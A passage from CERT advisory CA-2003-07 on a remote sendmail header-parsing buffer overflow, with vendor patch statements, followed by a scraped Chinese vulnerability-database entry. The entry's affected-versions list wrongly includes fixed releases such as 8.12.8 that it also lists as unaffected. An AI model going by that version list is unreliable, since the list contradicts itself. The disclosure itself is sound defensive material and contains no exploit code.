       ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.9.3.security.cr.patch

Apply a patch from your vendor

   Many  vendors  include  vulnerable  sendmail  servers as part of their
   software distributions. We have notified vendors of this vulnerability
   and  recorded  their  responses  in  the  systems  affected section of
   VU#398025.  Several  vendors  have  provided  a  statement  for direct
   inclusion in this advisory; these statements are available in Appendix
   A.

Enable the RunAsUser option

   There is no known workaround for this vulnerability. Until a patch can
   be  applied,  you  may  wish to set the RunAsUser option to reduce the
   impact  of this vulnerability. As a good general practice, the CERT/CC
   recommends  limiting  the  privileges  of  an  application  or service
   whenever possible.

Appendix A. - Vendor Information

   This  appendix  contains  information  provided  by  vendors  for this
   advisory.  As  vendors  report new information to the CERT/CC, we will
   update this section and note the changes in our revision history. If a
   particular  vendor  is  not  listed  below, we have not received their
   comments.

Apple Computer, Inc.

   Security  Update  2003-03-03  is available to fix this issue. Packages
   are  available  for  Mac OS X 10.1.5 and Mac OS X 10.2.4. It should be
   noted  that  sendmail  is  not enabled by default on Mac OS X, so only
   those  systems which have explicitly enabled it are susceptible to the
   vulnerability.  All  customers of Mac OS X, however, are encouraged to
   apply this update to their systems.

Avaya, Inc.

   Avaya  is  aware  of the vulnerability and is investigating impact. As
   new information is available this statement will be updated.

BSD/OS

   Wind  River  Systems  has  created  patches for this problem which are
   available  from  the  normal  locations for each release. The relevant
   patches are M500-006 for BSD/OS version 5.0 or the Wind River Platform
   for  Server Appliances 1.0, M431-002 for BSD/OS 4.3.1, or M420-032 for
   BSD/OS 4.2 systems.

Cisco Systems

   Cisco is investigating this issue. If we determine any of our products
   are    vulnerable    that    information   will   be   available   at:
   http://www.cisco.com/go/psirt

Cray Inc.

   The  code  supplied  by Cray, Inc. in Unicos, Unicos/mk, and Unicos/mp
   may  be  vulnerable.  Cray  has  opened  SPRs  724749  and  724750  to
   investigate.

   Cray, Inc. is not vulnerable for the MTA systems.

Hewlett-Packard Company

   SOURCE:
            Hewlett-Packard Company
            HP Services
            Software Security Response Team
   
   x-ref:  SSRT3469 sendmail
   
   HP will provide notice of the availability of patches through standard
   security bulletin announcements and be available from your normal HP
   Services support channel.

IBM Corporation

   The  AIX  operating  system  is  vulnerable  to  the  sendmail  issues
   discussed in releases 4.3.3, 5.1.0 and 5.2.0.

   A  temporary  patch  is available through an efix package which can be
   found at
   ftp://ftp.software.ibm.com/aix/efixes/security/sendmail_efix.tar.Z

   IBM will provide the following official fixes:

          APAR   number   for   AIX  4.3.3:  IY40500  (available  approx.
          03/12/2003)
          APAR   number   for   AIX  5.1.0:  IY40501  (available  approx.
          04/28/2003)
          APAR   number   for   AIX  5.2.0:  IY40502  (available  approx.
          04/28/2003)

Openwall GNU/*/Linux

   Openwall GNU/*/Linux is not vulnerable. We use Postfix as the MTA, not
   sendmail.

Red Hat Inc.

   Updated  sendmail  packages  that are not vulnerable to this issue are
   available  for  Red  Hat  Linux,  Red Hat Advanced Server, and Red Hat
   Advanced  Workstation.  Red Hat Network users can update their systems
   using the 'up2date' tool.

   Red Hat Linux:

     http://rhn.redhat.com/errata/RHSA-2003-073.html

   Red Hat Linux Advanced Server, Advanced Workstation:

     http://rhn.redhat.com/errata/RHSA-2003-074.html

SGI

   SGI  acknowledges  VU#398025  reported  by  CERT  and  has released an
   advisory to address the vulnerability on IRIX.

   Refer   to   SGI   Security   Advisory  20030301-01-P  available  from
   ftp://patches.sgi.com/support/free/security/advisories/20030301-01-P
   or http://www.sgi.com/support/security/.

The Sendmail Consortium

   The  Sendmail  Consortium  suggests  that  sites  upgrade to 8.12.8 if
   possible.  Alternatively,  patches  are available for 8.9, 8.10, 8.11,
   and 8.12 on http://www.sendmail.org/

Sendmail, Inc.

   All  commercial  releases including Sendmail Switch, Sendmail Advanced
   Message  Server (which includes the Sendmail Switch MTA), Sendmail for
   NT,  and Sendmail Pro are affected by this issue. Patch information is
   available at http://www.sendmail.com/security.
     _________________________________________________________________

   Our  thanks  to  Internet  Security Systems, Inc. for discovering this
   problem,  and  to  Eric  Allman,  Claus  Assmann,  and Greg Shapiro of
   Sendmail  for  notifying  us of this problem. We thank both groups for
   their assistance in coordinating the response to this problem.
     _________________________________________________________________

   Authors: Jeffrey P. Lanza and Shawn V. Hernan
   ______________________________________________________________________

   This document is available from:
   http://www.cert.org/advisories/CA-2003-07.html
   ______________________________________________________________________

CERT/CC Contact Information

   Email: cert@cert.org
          Phone: +1 412-268-7090 (24-hour hotline)
          Fax: +1 412-268-6989
          Postal address:
          CERT Coordination Center
          Software Engineering Institute
          Carnegie Mellon University
          Pittsburgh PA 15213-3890
          U.S.A.

   CERT/CC   personnel   answer  the  hotline  08:00-17:00  EST(GMT-5)  /
   EDT(GMT-4)  Monday  through  Friday;  they are on call for emergencies
   during other hours, on U.S. holidays, and on weekends.

Using encryption

   We  strongly  urge you to encrypt sensitive information sent by email.
   Our public PGP key is available from
   http://www.cert.org/CERT_PGP.key

   If  you  prefer  to  use  DES,  please  call the CERT hotline for more
   information.

Getting security information

   CERT  publications  and  other security information are available from
   our web site
   http://www.cert.org/

   To  subscribe  to  the CERT mailing list for advisories and bulletins,
   send  email  to majordomo@cert.org. Please include in the body of your
   message

   subscribe cert-advisory

   *  "CERT"  and  "CERT  Coordination Center" are registered in the U.S.
   Patent and Trademark Office.
   ______________________________________________________________________

   NO WARRANTY
   Any  material furnished by Carnegie Mellon University and the Software
   Engineering  Institute  is  furnished  on  an  "as is" basis. Carnegie
   Mellon University makes no warranties of any kind, either expressed or
   implied  as  to  any matter including, but not limited to, warranty of
   fitness  for  a  particular purpose or merchantability, exclusivity or
   results  obtained from use of the material. Carnegie Mellon University
   does  not  make  any warranty of any kind with respect to freedom from
   patent, trademark, or copyright infringement.
     _________________________________________________________________

   Conditions for use, disclaimers, and sponsorship information

   Copyright 2003 Carnegie Mellon University.

   Revision History
Mar 03, 2003:  Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPmOZEWjtSoHZUTs5AQGNUwP/YC0aRMqrFoLxUjG9pZIOBb98z8BFPfTW
w/5u09rcW7WpH52XGaOWbu9PYtnLKtPaMrwevc38r6ILvZywasxdpUcUtR4W9XPZ
9EW4LYB1EaU81PLpzkQXWkVAhlX4vgHTU75oEcjfsacxXHlxtMYM1JpmyO8gvlnl
pD4vLdvJqHE=
=PfHu
-----END PGP SIGNATURE-----
    

- 漏洞信息

4502
Sendmail headers.c crackaddr Function Address Field Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2003-03-04 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 8.12.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Sendmail Header Processing Buffer Overflow Vulnerability
Boundary Condition Error 6991
Yes Yes
2003-03-02 12:00:00 2007-09-22 12:30:00
Discovered by Mark Dowd of ISS X-Force.

- 受影响的程序版本

Wind River Systems Platform SA 1.0
Wind River Systems BSD/OS 5.0
Wind River Systems BSD/OS 4.3.1
Wind River Systems BSD/OS 4.2
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun LX50
Sun Cobalt RaQ XTR
Sun Cobalt RaQ 550
Sun Cobalt RaQ 4
Sun Cobalt RaQ 3
Sun Cobalt Qube 3
Sun Cobalt ManageRaQ3 3000R-mr
Sun Cobalt CacheRaQ 4
SGI IRIX 6.5.19
SGI IRIX 6.5.18
SGI IRIX 6.5.17
SGI IRIX 6.5.16
SGI IRIX 6.5.15
SGI IRIX 6.5.14
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI Freeware 1.0
Sendmail Inc Sendmail Switch 3.0.2
Sendmail Inc Sendmail Switch 3.0.1
Sendmail Inc Sendmail Switch 3.0
Sendmail Inc Sendmail Switch 2.2.4
Sendmail Inc Sendmail Switch 2.2.3
Sendmail Inc Sendmail Switch 2.2.2
Sendmail Inc Sendmail Switch 2.2.1
Sendmail Inc Sendmail Switch 2.2
Sendmail Inc Sendmail Switch 2.1.4
Sendmail Inc Sendmail Switch 2.1.3
Sendmail Inc Sendmail Switch 2.1.2
Sendmail Inc Sendmail Switch 2.1.1
Sendmail Inc Sendmail Switch 2.1
Sendmail Inc Sendmail for NT 3.0.2
Sendmail Inc Sendmail for NT 3.0.1
Sendmail Inc Sendmail for NT 3.0
Sendmail Inc Sendmail for NT 2.6.1
Sendmail Inc Sendmail for NT 2.6
Sendmail Inc Sendmail Advanced Message Server 1.3
Sendmail Inc Sendmail Advanced Message Server 1.2
Sendmail Consortium Sendmail Switch 3.0.2
Sendmail Consortium Sendmail Switch 3.0.1
Sendmail Consortium Sendmail Switch 3.0
Sendmail Consortium Sendmail Switch 2.2.4
Sendmail Consortium Sendmail Switch 2.2.3
Sendmail Consortium Sendmail Switch 2.2.2
Sendmail Consortium Sendmail Switch 2.2.1
Sendmail Consortium Sendmail Switch 2.2
Sendmail Consortium Sendmail Switch 2.1.4
Sendmail Consortium Sendmail Switch 2.1.3
Sendmail Consortium Sendmail Switch 2.1.2
Sendmail Consortium Sendmail Switch 2.1.1
Sendmail Consortium Sendmail Switch 2.1
Sendmail Consortium Sendmail for NT 3.0.2
Sendmail Consortium Sendmail for NT 3.0.1
Sendmail Consortium Sendmail for NT 3.0
Sendmail Consortium Sendmail for NT 2.6.1
Sendmail Consortium Sendmail for NT 2.6
Sendmail Consortium Sendmail 8.12.7
+ OpenPKG OpenPKG 1.2
+ Slackware Linux 8.1
+ SOTLinux SOTLinux 2003 Desktop
+ SOTLinux SOTLinux 2003 Server
Sendmail Consortium Sendmail 8.12.6
Sendmail Consortium Sendmail 8.12.5
Sendmail Consortium Sendmail 8.12.4
+ OpenBSD OpenBSD 3.2
+ Slackware Linux 8.1
+ Slackware Linux -current
Sendmail Consortium Sendmail 8.12.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.6
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
Sendmail Consortium Sendmail 8.12.2
Sendmail Consortium Sendmail 8.12.1
+ HP MPE/iX 7.5
+ HP MPE/iX 7.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Sendmail Consortium Sendmail 8.12 beta7
Sendmail Consortium Sendmail 8.12 beta5
Sendmail Consortium Sendmail 8.12 beta16
Sendmail Consortium Sendmail 8.12 beta12
Sendmail Consortium Sendmail 8.12 beta10
Sendmail Consortium Sendmail 8.12 .0
Sendmail Consortium Sendmail 8.11.6
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4
+ Immunix Immunix OS 7.0
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.0 i386
+ RedHat Linux 6.2 i386
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ Sun Cobalt RaQ 550
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.4
+ Conectiva Linux 7.0
- Slackware Linux 8.0
Sendmail Consortium Sendmail 8.11.3
- MandrakeSoft Corporate Server 1.0.1
- Mandriva Linux Mandrake 8.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
- Slackware Linux 7.1
Sendmail Consortium Sendmail 8.11.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
Sendmail Consortium Sendmail 8.11.1
Sendmail Consortium Sendmail 8.11
+ Compaq Tru64 5.1 b
+ Compaq Tru64 5.1 a
+ Compaq Tru64 5.1
+ IBM AIX 5.2
+ IBM AIX 5.1
- Mandriva Linux Mandrake 7.2
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ SCO Open Server 5.0.5
+ SCO Open Server 5.0.4
Sendmail Consortium Sendmail 8.10.2
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ 4
+ Sun Cobalt RaQ XTR
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ4 3001R
Sendmail Consortium Sendmail 8.10.1
Sendmail Consortium Sendmail 8.10
Sendmail Consortium Sendmail 8.9.3
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ IBM AIX 4.3.3
+ SGI IRIX 6.5.19
+ SGI IRIX 6.5.18 m
+ SGI IRIX 6.5.18 f
+ SGI IRIX 6.5.17 m
+ SGI IRIX 6.5.17 f
+ SGI IRIX 6.5.16 m
+ SGI IRIX 6.5.16 f
+ SGI IRIX 6.5.15 m
+ SGI IRIX 6.5.15 f
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.11 m
+ SGI IRIX 6.5.11 f
+ SGI IRIX 6.5.10 m
+ SGI IRIX 6.5.10 f
+ SGI IRIX 6.5.9 m
+ SGI IRIX 6.5.9 f
+ SGI IRIX 6.5.8 m
+ SGI IRIX 6.5.8 f
+ SGI IRIX 6.5.7 m
+ SGI IRIX 6.5.7 f
Sendmail Consortium Sendmail 8.9.2
Sendmail Consortium Sendmail 8.9.1
Sendmail Consortium Sendmail 8.9 .0
Sendmail Consortium Sendmail 8.8.8
Sendmail Consortium Sendmail 5.65
Sendmail Consortium Sendmail 5.61
Sendmail Consortium Sendmail 5.59
SCO Unixware 7.1.3
SCO Unixware 7.1.1
SCO Open UNIX 8.0
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
IBM z/OS V1R4
IBM z/OS V1R2
IBM OS/390 V2R8
IBM OS/390 V2R10
IBM MVS
HP MPE/iX 6.5
HP HP-UX (VVOS) 11.0 4
HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.04
HP HP-UX B.11.00
HP AlphaServer SC
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6
SGI IRIX 6.5.20
Sendmail Inc Sendmail Switch 3.0.3
Sendmail Inc Sendmail Switch 2.2.5
Sendmail Inc Sendmail Switch 2.1.5
Sendmail Inc Sendmail for NT 3.0.3
Sendmail Inc Sendmail for NT 2.6.2
Sendmail Consortium Sendmail Switch 3.0.3
Sendmail Consortium Sendmail Switch 2.2.5
Sendmail Consortium Sendmail Switch 2.1.5
Sendmail Consortium Sendmail for NT 3.0.3
Sendmail Consortium Sendmail for NT 2.6.2
Sendmail Consortium Sendmail 8.12.8
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0 i386
+ Yellow Dog Linux 3.0
Openwall Openwall GNU/*/Linux 1.0
Juniper Networks JUNOS 5.1
Juniper Networks JUNOS 5.0

- 不受影响的程序版本

SGI IRIX 6.5.20
Sendmail Inc Sendmail Switch 3.0.3
Sendmail Inc Sendmail Switch 2.2.5
Sendmail Inc Sendmail Switch 2.1.5
Sendmail Inc Sendmail for NT 3.0.3
Sendmail Inc Sendmail for NT 2.6.2
Sendmail Consortium Sendmail Switch 3.0.3
Sendmail Consortium Sendmail Switch 2.2.5
Sendmail Consortium Sendmail Switch 2.1.5
Sendmail Consortium Sendmail for NT 3.0.3
Sendmail Consortium Sendmail for NT 2.6.2
Sendmail Consortium Sendmail 8.12.8
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0 i386
+ Yellow Dog Linux 3.0
Openwall Openwall GNU/*/Linux 1.0
Juniper Networks JUNOS 5.1
Juniper Networks JUNOS 5.0

- 漏洞讨论

Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.

Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.

Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree.

- 漏洞利用

The following exploit was provided:

- 解决方案

Please see the references for more information.


Sun Solaris 8_sparc

IBM z/OS V1R4
  • IBM PQ71679


Sun Solaris 7.0

HP HP-UX B.11.11

HP HP-UX B.11.00

IBM z/OS V1R2
  • IBM PQ71679


IBM OS/390 V2R8
  • IBM PQ71679


HP HP-UX 10.20

HP HP-UX 11.0 4

HP HP-UX 11.0

HP HP-UX 11.11

HP HP-UX 11.22

Sendmail Inc Sendmail Switch 2.1.2

Sendmail Inc Sendmail Switch 2.1.3

Sendmail Inc Sendmail Switch 2.2

Sendmail Inc Sendmail Switch 2.2.2

Sendmail Inc Sendmail Switch 2.2.3

Sendmail Inc Sendmail for NT 2.6

Sendmail Inc Sendmail for NT 2.6.1

Sendmail Inc Sendmail Switch 3.0.1

Sendmail Inc Sendmail for NT 3.0.2

FreeBSD FreeBSD 4.6

FreeBSD FreeBSD 5.0

Sendmail Consortium Sendmail 5.59

Sendmail Consortium Sendmail 5.65

SGI IRIX 6.5.15

SGI IRIX 6.5.16

SGI IRIX 6.5.17

SGI IRIX 6.5.18

SGI IRIX 6.5.19

SCO Unixware 7.1.1

Sendmail Consortium Sendmail 8.10

Sendmail Consortium Sendmail 8.10.1

Sendmail Consortium Sendmail 8.10.2

Sendmail Consortium Sendmail 8.11

Sendmail Consortium Sendmail 8.11.2

Sendmail Consortium Sendmail 8.11.3

Sendmail Consortium Sendmail 8.11.4

Sendmail Consortium Sendmail 8.11.5

Sendmail Consortium Sendmail 8.11.6

Sendmail Consortium Sendmail 8.12 beta12

Sendmail Consortium Sendmail 8.12 beta5

Sendmail Consortium Sendmail 8.12 beta16

Sendmail Consortium Sendmail 8.12.1

Sendmail Consortium Sendmail 8.12.3

Sendmail Consortium Sendmail 8.12.4

Sendmail Consortium Sendmail 8.12.7

Sendmail Consortium Sendmail 8.9 .0

Sendmail Consortium Sendmail 8.9.2

Sendmail Consortium Sendmail 8.9.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站